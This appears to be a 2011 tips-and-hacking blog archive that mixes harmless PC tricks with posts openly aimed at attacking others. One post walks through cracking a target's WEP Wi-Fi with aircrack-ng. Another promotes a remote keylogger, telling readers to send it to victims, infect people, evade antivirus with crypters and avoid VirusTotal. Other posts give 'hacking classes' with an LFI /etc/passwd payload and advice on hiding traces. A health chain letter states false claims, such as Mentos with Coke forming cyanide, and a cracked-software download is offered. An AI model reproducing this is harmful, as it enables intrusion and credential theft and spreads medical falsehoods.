Tuesday, May 24, 2011

AIRTEL SMS TIMER

Schedule SMS to be sent at a time you wish!
This is new service from Airtel, not exactly a trick.
Example:
9895xxxxx 2508 2359 Happy Birthday!
Send it to 52233.
This will send the SMS at 11.59PM on 25th of August.
It will cost just Re.1 per sms.

SPEED UP ACROBAT READER (ALMOST LIKE NOTEPAD)

Adobe Acrobat reader always consumes more memory when it starts. The reason behind is, it loads all the plugins, even the plugins that you do not use. This trick is to remove all the plugins from the plugins directory to elsewhere. Hence, whenever you open Acrobat reader it directly opens the files without loading any plugins and the speed is just like Notepad.

1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)

2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).

Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).

Now your acrobat reader will load very fast and almost as good as notepad.

Monday, May 23, 2011

Access WAP Sites on PC

This tutorial will show you how to access WAP (Wireless Application Protocol) sites on your PC. Sometimes you may want to access the mobile versions of your favorite sites on your PC, but some browsers don’t support WML (Wireless Markup Language) and wont be able to display the pages.

To open WAP sites on your PC, you can use online WAP emulators or use software to do so.

Emulators:

You can use various online WAP emulators which allow you to access WAP sites using a web interface.

Some of the most popular ones include:

1. dotMobi WAP Emulatorhttp://mtld.mobi/emulator.php

2. WAPTiger WAP Emulatorhttp://www.waptiger.com/waptiger/

3. TagTag WAP Emulatorhttp://tagtag.com/cgi/wapemulator.cgi

Softwares:

To access WAP sites using softwares, I would recommend:

1. Opera Web Browser

Opera, the best web browser on Earth, fully supports WAP sites and allows you to surf WML pages easily.

Get Opera here: Opera Download

2. WMLBROWSER Firefox Extension

To access WAP sites in Firefox, you can install the WMLBROWSER extension. Just install the extension, go to View > Toolbars > Customize and add the WML browser Toolbar button to your toolbar. You can switch to WML ON and WML OFF to enable and disable WAP sites.

Download WMLBROWSER here: WML Browser Firefox Addon

3. WINWAP

WinWAP is a standalone WAP browser that you can use to access WAP sites on PC. It emulates cellphones, you can actually use the cellphone keys to navigate through the mobile web. You can also use different phone skins. You can get the WINWAP browser here: WinWAP Browser Emulator

Sunday, May 22, 2011

How to Hack WiFi (WEP) Using Backtrack 4

1. Boot Live CD/DVD of BackTrack 4. After it boots, type in "startx" to start GUI

2. Open new Konsole (backtrack's terminal).

3. Type, not using qoutes, "airodump-ng wlan0". Now find the network you want to attack. Copy the BSSID and the channel (write down on piece of paper and keep handy)

4. Open new Konsole, type "airodump-ng -w wep -c 11 --bssid 00:24:b2:80:d7:3c wlan0" **X & 00:24:b2:80:d7:3c are examples of the channel and bssid you should have copied**

5. You are now fixed on to the network you want to attack.

6. Close the first Konsole, open a new Konsole and type "aireplay-ng -1 0 -a 00:24:b2:80:d7:3c wlan0" **00:24:b2:80:d7:3c is an example as well**

7. Open another new Konsole, type "aireplay-ng -3 -b 00:24:b2:80:d7:3c wlan0" **00:24:b2:80:d7:3c example"

8. Go to first Konsole, wait for the Data to reach to 30,000; go to 3rd Konsole, hit CNTL + C, then type in "dir", hit enter

9. Type "airecrack-ng wep.01.cap", hit enter.

10. Let it run its course, should only take a few moments. Once key is found, it will show up with semi-colons in it. Take out the semi-colons, and this will be the key. (Example of key; 53:06:66:51:50, so it will be 5306665150)

11. Enjoy Hacking, Enjoy Hackton.

Saturday, May 21, 2011

Remote Password Hacking/Stealer Tool

Remote Keylogger to Hack E-Mail Account Passwords.



Hack E-Mail Passwords using Remote Password Hacking Tool


tDev1l keylogger is used to steal all stored passwords on victim computer. When victim opens our sent keylogger on his computer, it searches for all saved passwords on his computer and then simply sends those saved passwords along with user ids to you via email.


How to use tDev1l keylogger
?


1. First of all download tDev1l keylogger from here.

You need a registration key to unlock it. Use one of these: tdev1l-its-0k-2-cry or devil-its-0k-2-cry

2. Run "tDevil.exe" file to get something like this:


3. Now simply type in your Gmail email adress and password (You can create a gmail account only for keyloggers, like this one), in "Send Logs Every Minute" choose like 30, so every 30 minutes u will get a email with the key logs. Now press "Build" and send the built app to victim. When they open nothing happens, but there keylogged and every 30 min u will get email with there key logs in.

4. To remove the Keylogger from your pc open taskmanager and kill the process "server.exe".

Now all you have to do is spread the server around and infect people with it and soon you will have lots of email in your gmail account with there Keystrokes.

5. This password stealer server is detected as virus during runtime. But, its 100% FUD (Fully Undetectable) during scantime. So, you can use Crypter / Binder to get rid of antivirus detection.


Very Important:
Do not scan these tools on VirusTotal. Use http://scanner.novirusthanks.org and also check the "Do not distribute the sample" option.

Lock Your Computer With USB Flash Drive

Security of laptops and notebooks have been evolving with new technologies like fingerprint readers, eye scanners, face recognition etc but what about the personal computers?

Using this trick you will be able to lock your computer with a Usb. The computer will work only when the Usb is plugged in. Once the Usb is removed keyboard and mouse will automatically get disabled and your screen will get dark. Moreover your computer will get automatically locked. To unlock the computer you will need to insert the Usb again.

This trick will work on on all versions of windows including both windows 32 bit and 64 bit

Here is the Trick to lock Your Computer With Usb Using Predator

1. Download predator software by clicking here

2. Predator will get launched automatically after completing installation if not you can run it from Start/Programs/Predator

3. Now Insert your Usb. You will get a message to define your new password (This process will not format your pendrive and your pendrive data will not be affected by this at all)



4. Click on Ok and Enter your your new password in next dialog box

5. Check that the drive letter displayed under “USB key drive” actually matches your flash drive or choose the correct letter from the dropdown list

6. Finally click on Create Key button and then on OK button



After this the software will automatically exit.Now restart the program by clicking the icon on desktop.

Predator will take few seconds for initialization. Once the icon in the taskbar turns green then your software has initialized itself.

Friday, May 20, 2011

Please Read Them Carefully and Forward to all of Your Friends - Health is Wealth

Hey Friends I am sharing with you some true Facts .. Please Follow them and forward to your Friends if they use them....



1)Mobile
Don't put your mobile closer to your ears until the
recipient answers, Because directly after dialing, the mobile
phone would use it's maximum signaling power,
which is: 2watts = 33dbi. Please Be Careful. Please use left ear while using
cell (mobile), because if you use the right one it may affect brain directly. This is a true fact from Apollo medical team.




2) APPY FIZZ
Do not drink APPY FIZZ . It contains cancer causing agent.

3) Mentos
Don't eat Mentos before or after drinking Coke or
Pepsi coz the
person will die immediately as the mixture
becomes cyanide. Please fwd to whom u care.


4) Kurkure
Don't eat kurkure because it contains high amount of
plastic if U don't Believe burn kurkure n u can see
plastic melting. Please forward to all!!!!!!!!! !! News
report from
Times of India




5) Avoid these tablets as they are very dangerous
* D cold
* Vicks action- 500
* Actified
* Coldarin
* Co some
* Nice
* Nimulid
* Cetrizet-D
They contain Phenyl- Propanol -Amide PPA.Which Causes strokes, and these tablets are banned in U.S.


6) Cotton Ear Buds
Cotton Ear Buds... (Must read it) Please do not show sympathy to people selling buds on roadside or at Signals..... Just wanted to warn you people not to buy those packs of ear buds you get at the roadside. It's made from cotton that has already been used in hospitals. They take all the dirty, blood and pus filled cotton, wash it, bleach it and use it to make ear buds. So, unless you want
to become the first person in the world to get Herpes Zoster Oticus (a viral infection of the inner, middle, and external ear) of the ear and that too from a cotton bud, DON'T BUY THEM! Please forward to all this may be
helpful for someone..... .......

Please forward to all your near and dear ones....!


Download Unlimited From Rapidshare,Hotfile without Premium Account Tested

Hey Frens after a Huge Search over the Internet I found a absolutely wonderful site through which you can download Unlimited from sites like Rapidshare, Hotfile,Uploading,Easy-share,megaupload and much more..


CLICK HERE


You can download File with as Much as speed your Internet Connection can Support with resume option...
So Guy isn't it an Absolutely Awesome Site..


CLICK HERE


METHOD TO DOWNLOAD UNLIMITED EXPLAINED BELOW:
Step 1 : Click on the Link " CLICK HERE" . Then a webpage will open as shown below:





Step2: Copy the URL (rapidshare, hotfile or anything else..) in the Link to Transload Section..as shown:



Step3: After you click transload file and new page will open as shown and click on the link Given...



Step4: Now Thats it ..


Proxy Switcher Standard 4.6.0 Full Download

Proxy Switcher Standard 4.6.0 | 5,24 MB

Different internet connections do often require completely different proxy server settings and it's a real pain to change them manually. Proxy Switcher provides proxy settings management solution and anonymous surfing capabilities. This includes flexible proxy server list management, proxy server tester and anonymous proxy server list downloader.

Proxy Switcher - surf anonymouslychange proxy settings on the fly

There are times when you have to cloak your true IP address. It might be that you want to remain anonymous when you visit a particular website. Or your access to various social networking and entertainment sites has been blocked.

The solution is to use Proxy Switcher for all the anonymous browsing needs. It can be used to avoid all sorts of limitations imposed by various sites. Be that a download site that limits amount of downloads. Or video site works only in a particular country - more often than not it gets defeated by the anonymous browsing features Proxy Switcher provides.

On top of that, if you used to manually change proxy settings Proxy Switcher provides a way to change them much faster and easier.
Proxy Switcher Benefits:
- Hide your IP address from the web sites you visit.
- Penetrate bans and blocks on forums, classifields and download sites (rapidshare etc.).
- Automatic proxy server switching for improved anonymous surfing.
- Easy way to change proxy settings on the fly.
- For webmasters - check search engine results from different countries.
- Fully compatible with Internet Explorer, Firefox, Opera and others.
- Advanced proxy list scanning and management.
Proxy Switcher 4.6.0 News
- Improved javascript enabled parser reliability, should avoid some crashes.
- Added new proxy list parsing engine - as a result new proxy list sites are added.
- Added new subcategory for Dead servers - permanently dead, ones that go into there will not get rechecked as often.
- Added check for presence of new version on site - will be shown in log.
- Program restores auto switching state after restart.
- Reduced used resources when idle even further (unused scanner workers are shut down).
Updated Ip2Country.
Release Date: 31/03/2010

Language: English


Crack: +


Download Links:





Hacking Class 4 - Scanning and Attacking Open Ports

This Blog
This Blog






* antivirus and spyware
* free downloads
* spyware terminator
* definitions
* tutorials

Hacking Class 4 - Scanning and Attacking Open Ports
Posted by Lokesh@Admin on Tuesday, October 20, 2009
17 comments

In my Previous class I have explained about footprinting i.e getting the IP of the Person/website/organisation whom you want to attack and extracting the personal Information.. You all were thinking that what was the use of that .. In this class you will came to know why we have undergo footprinting and analysis part...

In Scanning Part We Will Cover the Following Topics in details :

~ Definition of scanning
~ Types and objectives of Scanning
~ Understanding Scanning methodology
~ Checking live systems and open ports
~ Understanding scanning techniques
~ Different tools present to perform Scanning
~ Understanding banner grabbing and OS fingerprinting
~ Drawing network diagrams of vulnerable hosts
~ Preparing proxies
~ Understanding anonymizers
~ Scanning countermeasures

Hacking Class 4 - Scanning and Attacking Open Ports



What Is Scanning ?? And Why We Focus On that ?

Scanning as from the name means that we will scan something to find some details etc etc... Scanning basically refers to the gathering of following four informations...

We Scan systems for four basic purposes :-

* To find specific IP address
* Operating system
* System Architecture
* Services Running on system



The various types of scanning are as follows:
~Port Scanning
~Network Scanning
~Vulnerability Scanning

I want to Define These Terms here Only as they are of great use in further tutorial...

PORT SCANNING : There are 64k ports in a computer out of which 1k are fixed for system or OS services. In Port scanning we scan for the open Ports which can be used to attack the victim computer.
In Port scanning a series of messages sent to break into a computer to learn about the computer’s network services. Through this we will know that which port we will use to attack the victim..

Network Scanning : Network scanning is basically a procedure of finding the active hosts on the Network.
i.e We tries to find that system is standalone or multiuser...

This is done either for the purpose of attacking them or for network security assessment i.e how secured the network Is ??

Vulnerability Scanning : As from the name , In this type of scanning We scan the systems for finding the vulnerability i.e the weakness in OS/database ... Once we find the vulnerability or loop hole we can utilize it to Best..and attack the victim through that ...

OBJECTIVES OF SCANNING
These are Primary objectives of scanning i.e why do we do scanning :

~ To detect the live systems running on the network.
~ To discover which ports are active/running.
~ To discover the operating system running on the target system (fingerprinting).
~ To discover the services running on the target system.
~ To discover the IP address of the target system.


We will prefer TOOLS for this because they will reduce our Hectic Work... The first Tool that we Use is the NMAP :
DOWNLOAD :http://nmap.org/dist/nmap-5.00-setup.exe

Features of NMAP :

~ Nmap is used to carry out port scanning, OS detection, version detection, ping sweep, and many other techniques.
~ It scans a large number of machines at one time.
~ It is supported by many operating systems.
~ It can carry out all types of port scanning techniques.

Hacking Class 4 - Scanning and Attacking Open Ports


SECOND TOOL IS NET TOOLS 5.0.70 :

Itz is a collection of various Networking Tools ... must for beginners...
DOWNLOAD: http://www.softpedia.com/progDownload/Net-Tools-Download-22193.html


~ Net Tools Suite Pack is a collection of scanning tools.
~ This toolset contains tons of port scanners, flooders, web rippers, and mass e-mailers.
Note: Some of these tools may not Work but some are too good.

Hacking Class 4 - Scanning and Attacking Open Ports


Hacking Class 4 - Scanning and Attacking Open Ports

Thursday, May 19, 2011

How to hack a Website or websites database

Hello friends , welcome back to hacking class, today i will explain all the methods that are being used to hack a website or websites database. This is the first part of the class "How to hack a website or Websites database" and in this i will introduce all website hacking methods. Today I will give you the overview and in later classes we will discuss them one by one with practical examples. So guys get ready for first part of Hacking websites class.... Don't worry i will also tell you how to protect your websites from these attacks and other methods like hardening of SQL and hardening of web servers and key knowledge about CHMOD rights that what thing should be give what rights...

Note : This post is only for Educational Purpose only.





What are basic things you should know before website hacking?
First of all everything is optional as i will start from very scratch. But you need atleast basic knowledge of following things..
1. Basics of HTML, SQL, PHP.
2. Basic knowledge of Javascript.
3. Basic knowledge of servers that how servers work.
4. And most important expertize in removing traces otherwise u have to suffer consequences.
Now First two things you can learn from a very famous website for basics of Website design with basics of HTML,SQL,PHP and javascript.

And for the fourth point that you should be expert in removing traces . For this you can refer to first 5 hacking classes and specially read these two...

As we know traces are very important. Please don't ignore them otherwise you can be in big trouble for simply doing nothing. so please take care of this step.

METHODS OF HACKING WEBSITE:

1. SQL INJECTION
2. CROSS SITE SCRIPTING
3. REMOTE FILE INCLUSION
4. LOCAL FILE INCLUSION
5. DDOS ATTACK
6. EXPLOITING VULNERABILITY.

1. SQL INJECTION
First of all what is SQL injection? SQL injection is a type of security exploit or loophole in which a attacker "injects" SQL code through a web form or manipulate the URL's based on SQL parameters. It exploits web applications that use client supplied SQL queries.
The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed.

For more basic knowledge about SQL injection visit:
http://www.isoftdl.com/2009/12/hacking-class-14-how-to-deface-websites.html
The above tutorial consists of both types of SQL injection i.e. Manual and automatic through softwares. I will explain SQL injection in more detail with practical example in Next class.




2. CROSS SITE SCRIPTING
Cross site scripting (XSS) occurs when a user inputs malicious data into a website, which causes the application to do something it wasn’t intended to do. XSS attacks are very popular and some of the biggest websites have been affected by them including the FBI, CNN, Ebay, Apple, Microsft, and AOL.
Some website features commonly vulnerable to XSS attacks are:
• Search Engines
• Login Forms
• Comment Fields


Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.

I will explain this in detail in later hacking classes. So keep reading..


3. REMOTE FILE INCLUSION
Remote file inclusion is the most often found vulnerability on the website.
Remote File Inclusion (RFI) occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included into a website which allows the hacker to execute server side commands as the current logged on user, and have access to files on the server. With this power the hacker can continue on to use local
exploits to escalate his privileges and take over the whole system.
RFI can lead to following serious things on website :


4. LOCAL FILE INCLUSION
Local File Inclusion (LFI) is when you have the ability to browse through the server by means of directory transversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file contains the user information of a Linux system. Hackers find sites vulnerable to LFI the same way I discussed for RFI’s.
Let’s say a hacker found a vulnerable site, www.target-site.com/index.php?p=about, by means of directory transversal he would try to browse to the /etc/passwd file:
www.target-site.com/index.php?p= ../../../../../../../etc/passwd


I will explain it in detail with practical websites example in latter sequential classes on Website Hacking.


5. DDOS ATTACK
Simply called distributed denial of service attack. A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an Internet site or service from functioning efficiently or at all, temporarily or indefinitely. In DDOS attack we consumes the bandwidth and resources of any website and make it unavailable to its legitimate users.
For more detailed hack on DDOS visit:
http://www.isoftdl.com/2009/11/hacking-class-11-attacking-websitesddos.html


6.EXPLOTING VULNERABILITY
Its not a new category it comprises of above five categories but i mentioned it separately because there are several exploits which cannot be covered in the above five categories. So i will explain them individually with examples. The basic idea behind this is that find the vulnerability in the website and exploit it to get the admin or moderator privileges so that you can manipulate the things easily.

I hope you all now have a overview of that what is Website Hacking. In consecutive future classes i will explain all of these techniques in details. So guys keep reading..

Best Operating System for Hackers

Hi Friends, Most of my friends and isoftdl users asked me about which operating system is best for hackers and for doing hacking activities like hacking wireless network passwords, network sniffers,reverse engineering tools, application hacking tools and other encrypting and spoofing hacking tools. Today i will share with you which operating system i use for hacking activities. My favorite operating system is Backtrack Linux and Windows XP not because they are easier to use but because i love their vast functionality and features. But you can also give a try to Matriux Operating System and knoppix , Matriux OS is just awesome but its still under construction as designers are still working on it and patching it. Now lets discuss more about functionality of Backtrack operating system. I will not discuss more about windows XP because its so easy to understand that it needs no explanation.




best operating system for hackers, backtrack linux,  best Operating system for reverse engineering
Backtrack : Best Operating system for Hackers



Best Operating System : Backtrack Linux
BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking.
Regardless if you’re making BackTrack your primary operating system, booting from a Live DVD, or using your favourite thumb drive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.
BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tool collection to-date.
Back Track is quite possibly the most comprehensive Linux distribution of security tools. Both hackers and crackers can appreciate the features of this distribution. For black-hat hackers, it provides an easy access to software that facilitates exploitations for secured systems and other reverse engineering. For white-hatters, it is a penetration tester that finds holes in a security scheme. See, everybody wins!
Major Features of BackTrack Linux
BackTrack features the latest in security penetration software. The current Linux kernel is patched so that special driver installation is unnecessary for attacks. For example, an Atheros-based wireless networking adapter will no enter monitor mode or inject packets without the MadWiFi driver patch. With BackTrack, you don’t need to worry about that. It’s just plug-and-play ready-to-go!
What’s great is that this Linux distribution comes Live-on-CD. So, no installation is needed. However, what you experience BackTrack, you will realize that it is a must to download this operating system and install it on your Laptop. At the very least, download the VMWare Virtual Appliance for Backtrack. Make sure you also install the VMWare Tools for Linux as well. Many features will still work in VMWare mode.
  • Based on: Debian, Ubuntu
  • Origin: Switzerland
  • Architecture: i386
  • Desktop: Fluxbox, KDE
  • Category: Forensics, Rescue, Live Medium
  • Cost: Free
Hacking Tools:
BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.
BackTrack includes many well known security tools including:
  • Metasploit integration
  • RFMON Injection capable wireless drivers
  • Kismet
  • Nmap
  • Ettercap
  • Wireshark (formerly known as Ethereal)
  • BeEF (Browser Exploitation Framework)
A large collection of exploits as well as more common place software such as browsers. BackTrack arranges tools into 11 categories:
  • Information Gathering
  • Network Mapping
  • Vulnerability Identification
  • Web Application Analysis
  • Radio Network Analysis (802.11, Bluetooth, Rfid)
  • Penetration (Exploit & Social Engineering Toolkit)
  • Privilege Escalation
  • Maintaining Access
  • Digital Forensics
  • Reverse Engineering
  • Voice Over IP

eBoostr PRO v4.0 Build 544b - Use USB drive as RAM

Get Vista's ReadyBoost benefits on your Windows XP machine.

If there is one thing that can speed up your computer, it's memory. Adding more RAM can speed up your applications several times, decrease loading times and improve overall performance of your PC. More memory means less hard drive activity. But what if adding more RAM is not an option for you? Maybe you just don't have the necessary tools or experience, or just aren't comfortable with the idea of getting inside your PC. Or maybe you've got a notebook computer that's stuffed with RAM sticks or uses exotic and expensive memory. Or quite the opposite, you might already have enough RAM and adding more memory does not result in any visible performance benefits.Windows Vista enjoys ReadyBoost technology that uses external flash memory to speed up system performance without adding more RAM. But what if you use Windows XP and have no intention of upgrading?Hold on to your Windows XP system! There is no need to upgrade just for the sake of ReadyBoost! eBoostr speeds up Windows XP by using inexpensive flash memory. Using eBoostr increases system responsiveness and makes big applications such as Adobe Photoshop or Microsoft Office load much faster.


Unlike ReadyBoost, eBoostr is able to use almost any flash memory, including ReadyBoost certified units. Use up to four USB sticks, CompactFlash, SD, MMC or xD cards to give your Windows XP system a boost!eBoostr works perfectly for desktop computers, but laptop users gain even more. Laptop computers use slower hard drives than their desktop counterparts, and benefit even more from reducedhard drive activity provided by eBoostr. Notebooks not only work faster with eBoostr; they work longer. Less hard drive activity means less power consumption, which results in longer battery life.You might already have one or more flash sticks or memory cards sitting on your desk or in your digital camera. Plug them in, run eBoostr and enjoy the extra speed boost!


Key features of "eBoostr":

· Smart caches frequently used applications and files for maximum performance speed up;

· Supports both USB and non-USB removable media devices, as well as additional hard disks;

· Allows up to 4 devices for simultaneous smart caching;

· Compatible with all ReadyBoost ready devices.


What's New:-

· full Windows 7 compatibility

· new option of using hidden system memory for caching


Homepage -
www.eboostr.com/



eBoostr PRO v4.0 Build 544b - Use USB drive as RAM

Get Vista's ReadyBoost benefits on your Windows XP machine.

If there is one thing that can speed up your computer, it's memory. Adding more RAM can speed up your applications several times, decrease loading times and improve overall performance of your PC. More memory means less hard drive activity. But what if adding more RAM is not an option for you? Maybe you just don't have the necessary tools or experience, or just aren't comfortable with the idea of getting inside your PC. Or maybe you've got a notebook computer that's stuffed with RAM sticks or uses exotic and expensive memory. Or quite the opposite, you might already have enough RAM and adding more memory does not result in any visible performance benefits.Windows Vista enjoys ReadyBoost technology that uses external flash memory to speed up system performance without adding more RAM. But what if you use Windows XP and have no intention of upgrading?Hold on to your Windows XP system! There is no need to upgrade just for the sake of ReadyBoost! eBoostr speeds up Windows XP by using inexpensive flash memory. Using eBoostr increases system responsiveness and makes big applications such as Adobe Photoshop or Microsoft Office load much faster.


Unlike ReadyBoost, eBoostr is able to use almost any flash memory, including ReadyBoost certified units. Use up to four USB sticks, CompactFlash, SD, MMC or xD cards to give your Windows XP system a boost!eBoostr works perfectly for desktop computers, but laptop users gain even more. Laptop computers use slower hard drives than their desktop counterparts, and benefit even more from reducedhard drive activity provided by eBoostr. Notebooks not only work faster with eBoostr; they work longer. Less hard drive activity means less power consumption, which results in longer battery life.You might already have one or more flash sticks or memory cards sitting on your desk or in your digital camera. Plug them in, run eBoostr and enjoy the extra speed boost!


Key features of "eBoostr":

· Smart caches frequently used applications and files for maximum performance speed up;

· Supports both USB and non-USB removable media devices, as well as additional hard disks;

· Allows up to 4 devices for simultaneous smart caching;

· Compatible with all ReadyBoost ready devices.


What's New:-

· full Windows 7 compatibility

· new option of using hidden system memory for caching


Homepage -
www.eboostr.com/



Watch TV Online -20 Free Online TV Websites


Watch TV Online -20
Free Online TV Websites
1. TvChannelsFree.com- TvChannelsFree.com – The largest resource available on the Web for viewing Free Internet Television. Live streaming TV, recorded news, broadband internet TV stations, and video from all over the world. About 2,961 Online TV Channels from 60+ countries in Europe, North America, Africa, Asia, The Caribbean, Latin America, Middle East all in one website. You can stream live TV channels from over 60 different countries – starting from popular new channels like BBC, CNN and EuroSports to local channels in United States.

2. Surfthechannel- Online destination for streaming popular TV content for free. Freely stream TV shows, movies, documentaries, anime shows etc.

3. Hulu- Hulu is a website that offers free, ad-supported streaming video of TV shows and movies from NBC, FOX, and others. Hulu provides video in Flash Video format in a higher resolution and bit-rate than YouTube, but lower than standard-definition television, though many films are available in 480p.

4. ChannelChooser: ChannelChooser is a good place to find many different free web TV channels, all streaming.

5. wwITv.com: You can find free web TV channels from all over the world here; a great selection.

6. Miro: Download Miro to watch free internet video channels and play any video file.

7. Veoh.comp: Watch all kinds of free web TV and more videos at Veoh.com.

8. Blip.tv: Watch the most popular TV shows over at Blip.tv; lots of free web TV here.

9. Yahoo TV: Yahoo TV is still really getting going, but you can find a lot of good stuff here, especially trailers and pilots from upcoming TV shows.

10. AOL in2tv: AOL’s in2tv is one of the best places on the Web to find classic TV shows.

11. BBC: The BBC has generously placed its news programs online in a free, streaming format.

12. Newsfilm Library: From the University of South Carolina; this collection hosts a part of the Fox MovieTone collection.

13. Choose and Watch: Choose and Watch is a free web TV site with literally hundreds of channels to choose from.

14. Live Online TV: Live Online TV is a good site with many free channel offerings to choose from.

15. Zap2it.com: You can watch all sorts of free web TV at Zap2it, also includes news and reviews.

16. Streamick: Streamick has many, many free web TV channels to choose from, but I especially appreciate that it’s so nicely organized into categories.

17. TVLand:Watch old and new TV shows here at TVLand; I got sucked into an old episode of Little House on the Prairie.

18. SingingFish: SingingFish is a good place to find all kinds of multimedia. Make sure you take advantage of the advanced search filters.

19. CurrentTV: not a traditional TV network; this is mostly user-created and submitted free online TV.

20 FoodNetwork: Don’t have cable, but you need that recipe? No problem – you can watch free web TV demonstrations.

21. Google Video: Google Video is a good place to find free web TV, however, many of the shows are pay-per-view (you can just go over to YouTube and find them there!).

22. BeelineTV: Free web TV channels from all around the world.

23. Yahoo Video Search: Yahoo Video Search is a good place to find music videos, TV show snippets, and more.

24. RadioFreeWorld: Find free web TV here, as well as free online radio stations.